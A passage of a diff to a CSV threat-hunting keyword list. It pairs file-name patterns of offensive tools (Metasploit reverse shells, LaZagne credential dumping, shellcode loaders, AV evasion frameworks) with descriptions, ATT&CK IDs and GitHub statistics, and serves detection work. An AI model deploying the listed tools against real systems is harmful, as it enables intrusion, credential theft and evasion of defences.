Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*windows/c_payload_util*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Windows/lazagne.spec*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*windows/shell_reverse_tcp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*windows/x64/meterpreter_reverse_tcp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*windows_agent/asm/x64/alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*windows_agent/asm/x86/alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*windows_agent/dll_main.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" @@ -18282,68 +18470,68 @@ "*windows_agent/win_*.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*windows_agent/win_named_pipe.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*windows_agent/win_shell.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*windows_autologin.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*windows_autologin.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*windows_console_interceptor*dll_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*windows_console_interceptor*exe_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*windows_console_interceptor*interceptor.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*windows_credentials.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*windows_credentials.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*windows_key.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*windows_recon.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" -"*windows_sam_hivenightmare.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*windows_sam_hivenightmare.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*windows_sam_hivenightmare.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*windows_sam_hivenightmare.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*windows10_ntfs_crash_dos*","offensive_tool_keyword","POC","PoC for a NTFS crash that I discovered. in various Windows versions Type of issue: denial of service. One can generate blue-screen-of-death using a handcrafted NTFS image. This Denial of Service type of attack. can be driven from user mode. limited user account or Administrator. It can even crash the system if it is in locked state.","T1499.002 - T1059.001 - T1538.002","TA0002 - TA0007 - TA0008","N/A","N/A","DDOS","https://github.com/mtivadar/windows10_ntfs_crash_dos","1","1","N/A","N/A","6","589","137","2020-04-28T18:11:52Z","2018-04-27T19:31:59Z" "*Windows7-BypassLogon-Screen.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" -"*WindowsEnum -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-WinEnum.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*WindowsExploits*","offensive_tool_keyword","Exploits","A curated archive of complied and tested public Windows exploits.","T1213 - T1210 - T1188 - T1055","TA0001 - TA0009 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WindowsExploits/Exploits","1","1","N/A","N/A","10","1212","565","2020-05-29T19:09:52Z","2017-06-05T15:39:22Z" +"*WindowsEnum -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-WinEnum.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*WindowsExploits*","offensive_tool_keyword","Exploits","A curated archive of complied and tested public Windows exploits.","T1213 - T1210 - T1188 - T1055","TA0001 - TA0009 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WindowsExploits/Exploits","1","1","N/A","N/A","10","1213","565","2020-05-29T19:09:52Z","2017-06-05T15:39:22Z" "*windows-exploit-suggester.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*windows-forkbomb.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*WindowsLies*BlockWindows*","offensive_tool_keyword","BlockWindows","Stop Windows 7 through 10 Nagging and Spying updates. Tasks. IPs. and services. Works with Windows 7 through 10","T1059 - T1562 - T1053 - T1543","TA0002 - TA0003 - TA0004 - TA0008","N/A","N/A","Defense Evasion","https://github.com/WindowsLies/BlockWindows","1","1","N/A","N/A","7","644","109","2020-04-11T15:38:12Z","2015-08-26T01:17:57Z" -"*Windows-Post-Exploitation*","offensive_tool_keyword","Windows-Post-Exploitation","Windows Post Exploitation list of tools on github. could also be related to folder name","T1021 - T1059 - T1078 - T1056 - T1028 - T1053 - T1003","TA0002 - TA0003 - TA0004 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/emilyanncr/Windows-Post-Exploitation","1","1","N/A","N/A","5","491","122","2021-09-20T01:47:13Z","2017-11-18T04:16:41Z" +"*Windows-Post-Exploitation*","offensive_tool_keyword","Windows-Post-Exploitation","Windows Post Exploitation list of tools on github. could also be related to folder name","T1021 - T1059 - T1078 - T1056 - T1028 - T1053 - T1003","TA0002 - TA0003 - TA0004 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/emilyanncr/Windows-Post-Exploitation","1","1","N/A","N/A","5","492","122","2021-09-20T01:47:13Z","2017-11-18T04:16:41Z" "*windows-privesc-check*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*Windows-Privilege-Escalation*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" -"*WindowsShareFinder.cs*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"*winexec.notepad.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*WinhttpShellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*WinhttpShellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*WinhttpShellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*WinhttpShellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*Win-Ops-Master.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*WindowsShareFinder.cs*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*winexec.notepad.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*WinhttpShellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*WinhttpShellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*WinhttpShellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*WinhttpShellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*Win-Ops-Master.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Winpayloads*","offensive_tool_keyword","Winpayloads","Undetectable Windows Payload Generation with extras Running on Python2.7","T1203 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/nccgroup/Winpayloads","1","1","N/A","N/A","10","1517","361","2022-11-08T08:14:23Z","2015-10-09T09:29:49Z" "*winPEAS.bat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*winPEAS.bat*","offensive_tool_keyword","PEASS","PEASS - Privilege 